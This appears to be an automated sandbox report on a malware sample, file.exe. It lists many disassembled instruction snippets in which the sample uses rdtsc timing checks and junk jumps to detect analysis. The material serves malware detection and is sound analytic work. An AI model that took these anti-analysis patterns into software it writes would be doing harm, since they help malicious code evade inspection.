                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976885 second address: 97689C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FE83906A386h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FE83906A386h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97689C second address: 9768A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9769E3 second address: 9769E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B57 second address: 976B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B6A second address: 976B81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE83906A38Eh 0x00000008 jns 00007FE83906A386h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B81 second address: 976B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B85 second address: 976B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976B9E second address: 976BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983B68 second address: 983B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007FE83906A39Bh 0x0000000d jmp 00007FE83906A395h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982BE5 second address: 982BFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83905447Ch 0x00000008 jnc 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FE839054476h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98365B second address: 983661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9838F0 second address: 9838FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9838FB second address: 983901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98993C second address: 989947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989947 second address: 98994D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98869B second address: 9886B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988806 second address: 98881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A390h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98881A second address: 988838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FE839054476h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988838 second address: 988869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A396h 0x00000007 jmp 00007FE83906A393h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988869 second address: 98886D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98886D second address: 98888D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE83906A386h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9889DB second address: 9889DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9889DF second address: 9889F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988C4D second address: 988C57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988C57 second address: 988C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988C60 second address: 988C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE839054476h 0x0000000a pop edi 0x0000000b popad 0x0000000c ja 00007FE839054484h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988C76 second address: 988C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9891AE second address: 9891C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE83905447Ch 0x0000000a jc 00007FE839054476h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98931F second address: 98932D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE83906A386h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98932D second address: 989331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989331 second address: 989337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989337 second address: 98933C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9897E7 second address: 9897FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A392h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9897FF second address: 989803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989803 second address: 989807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988143 second address: 988149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B456 second address: 98B45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E4C2 second address: 98E4EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE839054476h 0x00000008 jmp 00007FE83905447Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE839054482h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E4EC second address: 98E513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jns 00007FE83906A399h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DDC1 second address: 98DDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DDCD second address: 98DE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Dh 0x0000000c jmp 00007FE83906A38Ah 0x00000011 js 00007FE83906A399h 0x00000017 jmp 00007FE83906A393h 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FE83906A398h 0x00000023 jnc 00007FE83906A392h 0x00000029 jnc 00007FE83906A386h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DF5B second address: 98DF72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE83905447Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E1ED second address: 98E1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9921EC second address: 992218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 jmp 00007FE83905447Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99721E second address: 99724D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE83906A3BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE83906A393h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9969E1 second address: 9969E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9969E7 second address: 996A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE83906A38Ch 0x0000000a push eax 0x0000000b jc 00007FE83906A386h 0x00000011 jmp 00007FE83906A397h 0x00000016 pop eax 0x00000017 popad 0x00000018 js 00007FE83906A39Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996A22 second address: 996A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999A9E second address: 999AC2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A392h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE83906A386h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999AC2 second address: 999AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999C15 second address: 999C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A03F second address: 99A047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A047 second address: 99A04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A04D second address: 99A094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FE83905447Bh 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE839054484h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FE839054486h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A094 second address: 99A09A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A09A second address: 99A0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A0A1 second address: 99A0A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A0A7 second address: 99A0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9D second address: 99FACC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE83906A392h 0x00000008 js 00007FE83906A386h 0x0000000e jno 00007FE83906A386h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE83906A393h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FC2A second address: 99FC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FC2E second address: 99FC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9436A6 second address: 9436AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9436AC second address: 9436C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A399h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0207 second address: 9A0223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054488h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0223 second address: 9A0229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0229 second address: 9A0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE839054482h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054480h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A824D second address: 9A8255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8255 second address: 9A8259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8259 second address: 9A8261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8261 second address: 9A8268 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8AD6 second address: 9A8B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE83906A396h 0x0000000e jmp 00007FE83906A396h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8B0D second address: 9A8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE839054488h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8E06 second address: 9A8E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8E11 second address: 9A8E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE839054489h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FE83905447Bh 0x00000013 popad 0x00000014 jo 00007FE839054489h 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAA30 second address: 9AAA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAA34 second address: 9AAA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jno 00007FE839054476h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADB99 second address: 9ADB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADB9D second address: 9ADBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE839054476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE839054487h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADBC2 second address: 9ADBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD96 second address: 9ADD9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE18A second address: 9AE19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE83906A386h 0x0000000a jl 00007FE83906A386h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE19A second address: 9AE1A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE542 second address: 9AE554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AE554 second address: 9AE55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3592 second address: 9B35A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FE83906A38Dh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B35A6 second address: 9B35C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE83905448Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA41C second address: 9BA437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE83906A386h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA5B7 second address: 9BA5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAB93 second address: 9BAB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE83906A386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAB9F second address: 9BABB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054483h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BABB7 second address: 9BABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FE83906A386h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FE83906A395h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BABE2 second address: 9BAC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FE839054487h 0x0000000b jmp 00007FE839054480h 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB2A8 second address: 9BB2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA03F second address: 9BA04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE839054476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA04B second address: 9BA05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 js 00007FE83906A386h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3375 second address: 9C337D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6471 second address: 9C647D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE83906A386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4108 second address: 9D4118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jnp 00007FE839054476h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4118 second address: 9D4153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A38Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A390h 0x00000011 jmp 00007FE83906A397h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4153 second address: 9D4163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE83905447Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
